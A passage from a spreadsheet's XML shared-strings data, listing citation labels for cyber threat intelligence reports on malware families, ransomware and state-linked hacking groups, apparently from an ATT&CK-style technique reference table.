2020),(Citation: Securelist Remexi Jan 2019),(Citation: Radware Micropsia July 2018),(Citation: McAfee Babuk February 2021),(Citation: Forcepoint Monsoon),</t>
  </si>
  <si>
    <t>,(Citation: create_sym_links)</t>
  </si>
  <si>
    <t>(Citation: Anomali Rocke March 2019),(Citation: ESET OceanLotus macOS April 2019),(Citation: ANSSI Sandworm January 2021),(Citation: sentinelone apt32 macOS backdoor 2020),(Citation: Carbon Black Shlayer Feb 2019),(Citation: 20 macOS Common Tools and Techniques),(Citation: CheckPoint Dok),(Citation: Leonardo Turla Penquin May 2020),(Citation: Aqua Kinsing April 2020),(Citation: Shlayer jamf gatekeeper bypass 2021),(Citation: Cisco Talos Intelligence Group),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: LogRhythm WannaCry),(Citation: Cisco CaddyWiper March 2022),(Citation: ANSSI RYUK RANSOMWARE),(Citation: Microsoft PLATINUM April 2016),(Citation: NCC Group WastedLocker June 2020),(Citation: Crowdstrike Indrik November 2018),(Citation: ESET Grandoreiro April 2020),</t>
  </si>
  <si>
    <t>(Citation: Secure List Bad Rabbit),(Citation: Eclypsium Trickboot December 2020),</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 Phishery Aug 2018),(Citation: Gigamon Berserk Bear October 2021),(Citation: US-CERT SMB Security),(Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>,(Citation: Microsoft SolarWinds Customer Guidance),(Citation: FireEye ADFS)</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: Secureworks IRON RITUAL Profile),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks),(Citation: Microsoft SolarWinds Customer Guidance),(Citation: FireEye ADFS),(Citation: Mandiant Defend UNC2452 White Paper)</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),</t>
  </si>
  <si>
    <t>(Citation: Microsoft HAFNIUM March 2020),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: TrendMicro New Andariel Tactics July 2018),</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA453 July2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: FoxIT Wocao December 2019),(Citation: Amnesty Intl. Ocean Lotus February 2021),</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: IBM ITG18 2020),(Citation: Microsoft Targeting Elections September 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 TA551 Jan 2021),(Citation: Azure AD Recon),(Citation: Volexity Exchange Marauder March 2021),(Citation: Google EXOTIC LILY March 2022),(Citation: Malwarebytes Kimsuky June 2021),(Citation: DOJ Iran Indictments March 2018),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Proofpoint TA453 July2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Anomali Static Kitten February 2021),(Citation: AADInternals Documentation),(Citation: SecureWorks August 2019),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Kaspersky ThreatNeedle Feb 2021),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: KISA Operation Muzabi),(Citation: DOJ Iran Indictments March 2018),</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: AADInternals Documentation),(Citation: Azure AD Recon),</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lazarus Aug 2020),(Citation: KISA Operation Muzabi),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ESET Lazarus Jun 2020),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Gigamon Berserk Bear October 2021),</t>
  </si>
  <si>
    <t>(Citation: ClearSky Siamesekitten August 2021),(Citation: SecureWorks August 2019),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: ESET Lazarus Jun 2020),(Citation: ClearSky Lazarus Aug 2020),</t>
  </si>
  <si>
    <t>(Citation: ESET ComRAT May 2020),(Citation: Emissary Trojan Feb 2016),(Citation: Github PowerShell Empire),(Citation: GitHub Bloodhound),</t>
  </si>
  <si>
    <t>(Citation: Securelist DarkVishnya Dec 2018),(Citation: Wikipedia 802.1x)</t>
  </si>
  <si>
    <t>(Citation: sentinelone shlayer to zshlayer),(Citation: Check Point Warzone Feb 2020),(Citation: Tarrask scheduled task),(Citation: 20 macOS Common Tools and Techniques),(Citation: Shlayer jamf gatekeeper bypass 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Microsoft Get-InboxRule)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Regin),(Citation: ESET ComRAT May 2020),(Citation: Kaspersky ProjectSauron Full Report),(Citation: FireEye Bootkits),(Citation: Kaspersky Equation QA),</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: alientvault macspy),(Citation: LogRhythm WannaCry),(Citation: Symantec Calisto July 2018),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: ESET OceanLotus macOS April 2019),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Avira Mustang Panda January 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Trend Micro Iron Tiger April 2021),(Citation: wardle evilquest parti),(Citation: Talos Seduploader Oct 2017),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: CISA AppleJeus Feb 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Unit 42 Rocke January 2019),(Citation: Securelist Calisto July 2018),(Citation: trendmicro xcsset xcode project 2020),(Citation: CoinTicker 2019),(Citation: ESET LoudMiner June 2019),(Citation: objsee mac malware 2017),(Citation: Red Canary NETWIRE January 2020),(Citation: Talos PoetRAT April 2020),(Citation: Talos Rocke August 2018),(Citation: Sofacy Komplex Trojan),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: TrendMicro macOS Dacls May 2020),(Citation: Lazarus APT January 2022),(Citation: Trend Micro IXESHE 2012),(Citation: TrendMicro MacOS April 2018),(Citation: ESET Machete July 2019),(Citation: Trusteer Carberp October 2010),(Citation: NCC Group WastedLocker June 2020),(Citation: ESET Okrum July 2019),(Citation: Radware Micropsia July 2018),(Citation: McAfee Sharpshooter December 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Carbon Black Shlayer Feb 2019),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: ESET InvisiMole June 2020),(Citation: ESET Attor Oct 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Infoblox Lokibot January 2019),</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A),(Citation: FireEye SMOKEDHAM June 2021),(Citation: KISA Operation Muzabi),</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Double Tap),(Citation: Bromium Ursnif Mar 2017),(Citation: Talos Promethium June 2020),(Citation: McAfee Cuba April 2021),(Citation: McAfee APT28 DDE1 Nov 2017),(Citation: Carbon Black HotCroissant April 2020),(Citation: Palo Alto Sofacy 06-2018),(Citation: Cybereason Astaroth Feb 2019),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye APT32 May 2017),(Citation: Check Point Meteor Aug 2021),(Citation: Kaspersky Lyceum October 2021),(Citation: PWC KeyBoys Feb 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Microsoft Actinium February 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye APT34 Dec 2017),(Citation: Unit 42 Inception November 2018),(Citation: Unit 42 Gamaredon February 2022),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Secureworks MCMD July 2019),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: PTSecurity Higaisa 2020),(Citation: ClearSky Wilted Tulip July 2017),(Citation: objective-see windtail1 dec 2018),(Citation: FireEye APT19),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Alperovitch 2014),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: ESET InvisiMole June 2020),(Citation: FireEye APT29),(Citation: TrendMicro BlackTech June 2017),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Regin),(Citation: LOLBAS Esentutl),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Cyberreason Anchor December 2019),(Citation: SentinelOne Valak June 2020),(Citation: LOLBAS Expand),(Citation: ESET Gazer Aug 2017),(Citation: Unit 42 Valak July 2020),(Citation: Ciubotariu 2014),(Citation: Volexity PowerDuke November 2016),(Citation: ESET LoJax Sept 2018),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: Cybereason Valak May 2020),(Citation: Crowdstrike Indrik November 2018),(Citation: Cisco DNSMessenger March 2017),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: InsiderThreat NTFS EA Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye FiveHands April 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),</t>
  </si>
  <si>
    <t>(Citation: OSX Keydnap malware),(Citation: tau bundlore erika noerenberg 2020),(Citation: sentinellabs resource named fork 2020),(Citation: Apple App Security Overview)</t>
  </si>
  <si>
    <t>(Citation: Sophos Maze VM September 2020),(Citation: ESET LoudMiner June 2019),(Citation: Sophos Ragnar May 2020),</t>
  </si>
  <si>
    <t>,(Citation: Microsoft Disable VBA Jan 2020)</t>
  </si>
  <si>
    <t>(Citation: CyberBit Dtrack),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FOX-IT May 2016 Mofang),(Citation: Microsoft More information about DLL),(Citation: Executable Installers are Vulnerable),(Citation: Powersploit),(Citation: Microsoft CreateProcess),(Citation: Vulnerability and Exploit Detector),(Citation: Microsoft Dynamic Link Library Search Order),(Citation: Microsoft Dynamic-Link Library Security),(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>(Citation: RedCanary Mockingbird May 2020),(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010)</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: ESET EvilNum July 2020),(Citation: FireEye APT10 April 2017),(Citation: Nccgroup Emissary Panda May 2018),(Citation: ZScaler Hacking Team),(Citation: Proofpoint TA416 Europe March 2022),(Citation: FinFisher Citation),(Citation: Eset Ramsay May 2020),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: APT15 Intezer June 2018),(Citation: PWC Cloud Hopper April 2017),(Citation: Cybereason Chaes Nov 2020),(Citation: Symantec Whitefly March 2019),(Citation: Github PowerShell Empire),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Crutch December 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Mandiant APT1 Appendix),(Citation: FireEye Hikit Rootkit),(Citation: ESET Operation Groundbait),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: NCC Group WastedLocker June 2020),(Citation: MSTIC FoggyWeb September 2021),(Citation: ESET Sednit Part 3),(Citation: PowerSploit Documentation),(Citation: FireEye FIN7 Oct 2019),(Citation: ESET Exchange Mar 2021),(Citation: Group IB RTM August 2019),(Citation: Securelist BlackOasis Oct 2017),(Citation: GitHub PowerSploit May 2012),(Citation: Powersploit),(Citation: Microsoft Dynamic Link Library Search Order),(Citation: Microsoft Sxstrace),(Citation: Microsoft More information about DLL)</t>
  </si>
  <si>
    <t>(Citation: Recorded Future REDDELTA July 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Bitdefender Naikon April 2021),(Citation: Cybereason Oceanlotus May 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: Dell Sakula),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Cyble Egregor Oct 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: FinFisher Citation),(Citation: Palo Alto Networks BBSRAT),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Symantec Cicada November 2020),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: Arbor Musical Chairs Feb 2018),(Citation: Proofpoint TA416 November 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: PaloAlto Patchwork Mar 2018),(Citation: FireEye Clandestine Fox Part 2),(Citation: Medium Metamorfo Apr 2020),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Profero APT27 December 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Microsoft SIR Vol 21),(Citation: FireEye Metamorfo Apr 2018),(Citation: Securelist APT10 March 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Proofpoint ZeroT Feb 2017),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Trend Micro Tick November 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft FinFisher March 2018),(Citation: CheckPoint Naikon May 2020),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Anomali Pirate Panda April 2020),(Citation: ATT Sidewinder January 2021),(Citation: Securelist LuckyMouse June 2018),(Citation: PTSecurity Higaisa 2020),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Unit42 Emissary Panda May 2019),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: Stewart 2014),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye Clandestine Fox),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Forcepoint Monsoon),(Citation: Dell TG-3390),(Citation: Unit 42 KerrDown February 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Microsoft Wingbird Nov 2017),(Citation: Palo Alto PlugX June 2017),(Citation: Proofpoint TA459 April 2017),(Citation: NCC Group Chimera January 2021),(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>(Citation: Intezer HiddenWasp Map 2019),(Citation: Anomali Rocke March 2019),(Citation: trendmicro xcsset xcode project 2020),(Citation: ESET Ebury Oct 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Apple Developer Doco Hardened Runtime)</t>
  </si>
  <si>
    <t>,(Citation: Powersploit),(Citation: Executable Installers are Vulnerable)</t>
  </si>
  <si>
    <t>(Citation: Lazarus APT January 2022),(Citation: Qualys LolZarus),(Citation: FinFisher exposed ),</t>
  </si>
  <si>
    <t>(Citation: Github PowerShell Empire),(Citation: GitHub PowerSploit May 2012),(Citation: PowerSploit Documentation),(Citation: SANS Application Whitelisting),(Citation: Microsoft Using Software Restriction ),(Citation: Microsoft CreateProcess),(Citation: NSA MS AppLocker),(Citation: Vulnerability and Exploit Detector),(Citation: Windows Commands JPCERT),(Citation: Microsoft Application Lockdown),(Citation: Microsoft Dynamic-Link Library Security),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: F-Secure BlackEnergy 2014),(Citation: Powersploit),(Citation: Executable Installers are Vulnerable)</t>
  </si>
  <si>
    <t>(Citation: McAfee Honeybee),</t>
  </si>
  <si>
    <t>(Citation: Symantec W.32 Stuxnet Dossier),(Citation: DFIR Report APT35 ProxyShell March 2022),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Dragos Crashoverride 2018),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Wevtutil Microsoft Documentation),(Citation: win_xml_evt_log),(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>,(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014),(Citation: ESET InvisiMole June 2018),(Citation: NCSC Cyclops Blink February 2022),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Novetta Blockbuster),(Citation: TechNet Netsh Firewall),(Citation: Group-IB Anunak),(Citation: Trend Micro njRAT 2018),(Citation: Novetta Blockbuster Tools),(Citation: Aqua TeamTNT August 2020),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Cisco H1N1 Part 2),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: FireEye APT30),(Citation: Talos Rocke August 2018),(Citation: ESET Grandoreiro April 2020),(Citation: US-CERT HARDRAIN March 2018),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Malwarebytes DarkComet March 2018),(Citation: Zscaler Kasidet),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: TechNet Netsh),(Citation: Novetta Blockbuster Loaders),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: TrendMicro DarkComet Sept 2014),(Citation: FoxIT Wocao December 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Fidelis njRAT June 2013),(Citation: US-CERT TA18-074A),(Citation: US-CERT BADCALL),(Citation: Securelist Kimsuky Sept 2013),(Citation: Trend Micro Cyclops Blink March 2022),</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: wardle evilquest parti),(Citation: Dragos EKANS),(Citation: Baumgartner Naikon 2015),(Citation: McAfee Gold Dragon),(Citation: Sophos Netwalker May 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cylance Cleaver),(Citation: Sophos Ragnar May 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: Fortinet Agent Tesla June 2017),(Citation: Intrinsec Egregor Nov 2020),(Citation: Symantec WastedLocker June 2020),(Citation: FireEye Metamorfo Apr 2018),(Citation: objsee mac malware 2017),(Citation: Unit 42 Rocke January 2019),(Citation: Talos Promethium June 2020),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Novetta Blockbuster Tools),(Citation: DFIR Ryuk's Return October 2020),(Citation: McAfee Night Dragon),(Citation: Fortinet Diavol July 2021),(Citation: FireEye Ransomware Feb 2020),(Citation: CERT-FR PYSA April 2020),(Citation: Talos Rocke August 2018),(Citation: Arxiv Avaddon Feb 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: CrowdStrike Putter Panda),(Citation: TrendMicro DarkComet Sept 2014),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FireEye MuddyWater Mar 2018),(Citation: Trend Micro Skidmap),(Citation: ESET Turla PowerShell May 2019),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Cisco Talos Intelligence Group),(Citation: Medium S2W WhisperGate January 2022),(Citation: Medium Metamorfo Apr 2020),(Citation: TrendMicro Netwalker May 2020),(Citation: Check Point Meteor Aug 2021),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: NCC Group Team9 June 2020),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Cisco H1N1 Part 2),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye SUNBURST Additional Details Dec 2020),(Citation: Trend Micro Tick November 2019),(Citation: ESET Grandoreiro April 2020),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Unit 42 WhisperGate January 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Malwarebytes DarkComet March 2018),(Citation: SANS Conficker),(Citation: Novetta Blockbuster Loaders),(Citation: Check Point Warzone Feb 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Imminent Unit42 Dec2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Trend Micro Trickbot Nov 2018),(Citation: ESET Ebury Oct 2017),(Citation: 20 macOS Common Tools and Techniques),(Citation: Securelist Kimsuky Sept 2013),(Citation: Cybereason Clop Dec 2020),(Citation: Korean FSI TA505 2020),(Citation: Wired Lockergoga 2019),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Novetta Blockbuster),(Citation: US-CERT SHARPKNOT June 2018),(Citation: Talos Cobalt Strike September 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: Unit 42 Hildegard Malware),(Citation: Cylance Sodinokibi July 2019),(Citation: FireEye FIN6 Apr 2019),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Sophos Maze VM September 2020),(Citation: IBM MegaCortex),(Citation: Trend Micro Muddy Water March 2021),(Citation: Microsoft PLATINUM April 2016),(Citation: Prevx Carberp March 2011),(Citation: Group IB Ransomware September 2020),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Forcepoint Monsoon),(Citation: McAfee Maze March 2020),</t>
  </si>
  <si>
    <t>(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Securing bash history)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: Trend Micro Waterbear December 2019),(Citation: ESET Ebury Feb 2014),(Citation: Microsoft ETW May 2018)</t>
  </si>
  <si>
    <t>(Citation: BleepingComputer REvil 2021),(Citation: CyberArk Labs Safe Mode 2016)</t>
  </si>
  <si>
    <t>,(Citation: Content trust in Docker),(Citation: Content trust in Azure Container Registry)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Proofpoint TA505 October 2019),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: NTT Security Flagpro new December 2021),(Citation: ESET Hermetic Wizard March 2022),(Citation: Prevailion EvilNum May 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: F-Secure BlackEnergy 2014),(Citation: Lazarus APT January 2022),(Citation: Donut Github),(Citation: Prevailion DarkWatchman 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Cylance Dust Storm),(Citation: US-CERT Bankshot Dec 2017),(Citation: McAfee Sharpshooter December 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Microsoft NICKEL December 2021),(Citation: McAfee Maze March 2020),(Citation: FireEye Metamorfo Apr 2018),</t>
  </si>
  <si>
    <t>(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Securelist APT10 March 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Unit 42 Hildegard Malware),(Citation: ESET Kobalos Feb 2021),(Citation: Cisco Talos Intelligence Group),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Trend Micro TeamTNT),(Citation: Securing bash history)</t>
  </si>
  <si>
    <t>(Citation: Aqua TeamTNT August 2020),(Citation: objsee mac malware 2017),(Citation: ESET DazzleSpy Jan 2022),(Citation: Anomali Rocke March 2019),</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: Cybereason Cobalt Kitty 2017),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Deep Dive Solorigate January 2021),</t>
  </si>
  <si>
    <t>(Citation: Group IB GrimAgent July 2021),(Citation: Trustwave Pillowmint June 2020),(Citation: Secureworks MCMD July 2019),(Citation: NCC Group Team9 June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET RTM Feb 2017),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Trend Micro njRAT 2018),(Citation: Cylance Dust Storm),</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: GitHub Pupy),(Citation: FinFisher Citation),(Citation: Gh0stRAT ATT March 2019),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: FireEye APT32 May 2017),(Citation: Check Point Meteor Aug 2021),(Citation: McAfee Gold Dragon),(Citation: FireEye APT41 Aug 2019),(Citation: Microsoft FinFisher March 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Wevtutil Microsoft Documentation),(Citation: FireEye APT38 Oct 2018),(Citation: FoxIT Wocao December 2019),(Citation: ESEST Black Energy Jan 2016),(Citation: US-CERT TA18-074A),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Crowdstrike DNC June 2016),(Citation: Symantec Hydraq Jan 2010),(Citation: Symantec WastedLocker June 2020),(Citation: Talos Nyetya June 2017),(Citation: FireEye Hacking Team),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: CheckPoint SpeakUp Feb 2019),(Citation: ESET InvisiMole June 2018),(Citation: Palo Alto Reaver Nov 2017),(Citation: Talos ZxShell Oct 2014),(Citation: ESET EvilNum July 2020),(Citation: Secureworks Karagany July 2019),(Citation: Microsoft SDelete July 2016),(Citation: Carbon Black HotCroissant April 2020),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: KISA Operation Muzabi),(Citation: NCCGroup RokRat Nov 2018),(Citation: Trend Micro njRAT 2018),(Citation: TrendMicro Lazarus Nov 2018),(Citation: CISA EB Aug 2020),(Citation: Proofpoint Bumblebee April 2022),(Citation: TrendMicro Gamaredon April 2020),(Citation: Intel 471 REvil March 2020),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: Talos PoetRAT April 2020),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Mandiant APT1 Appendix),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Symantec Seaduke 2015),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: fsecure NanHaiShu July 2016),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Securelist WhiteBear Aug 2017),(Citation: Fysbis Dr Web Analysis),(Citation: ClearSky Siamesekitten August 2021),(Citation: Leonardo Turla Penquin May 2020),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: ESET RTM Feb 2017),(Citation: Dell Lateral Movement),(Citation: Trustwave Cherry Picker),(Citation: Kaspersky ProjectSauron Full Report),(Citation: Fidelis njRAT June 2013),(Citation: Symantec Linfo May 2012),(Citation: TrendMicro Ursnif Mar 2015),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: US-CERT TA18-074A),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: Volexity PowerDuke November 2016),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Symantec Pasam May 2012),(Citation: FireEye Hancitor),(Citation: FireEye Hacking Team),(Citation: objsee mac malware 2017),(Citation: Trustwave Pillowmint June 2020),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Cycraft Chimera April 2020),(Citation: ESET OceanLotus macOS April 2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: Talos Promethium June 2020),(Citation: Deep Instinct TA505 Apr 2019),(Citation: ZScaler Hacking Team),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Dell Sakula),(Citation: Mandiant No Easy Breach),(Citation: McAfee GhostSecret),(Citation: jRAT Symantec Aug 2018),(Citation: Palo Alto Networks BBSRAT),(Citation: ESET Hermetic Wizard March 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Unit 42 OilRig Sept 2018),(Citation: Profero APT27 December 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Talos Bisonal Mar 2020),(Citation: McAfee Night Dragon),(Citation: ESET LoudMiner June 2019),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: FireEye APT35 2018),(Citation: Kaspersky WIRTE November 2021),(Citation: CERT-FR PYSA April 2020),(Citation: TechNet Del),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: TrendMicro 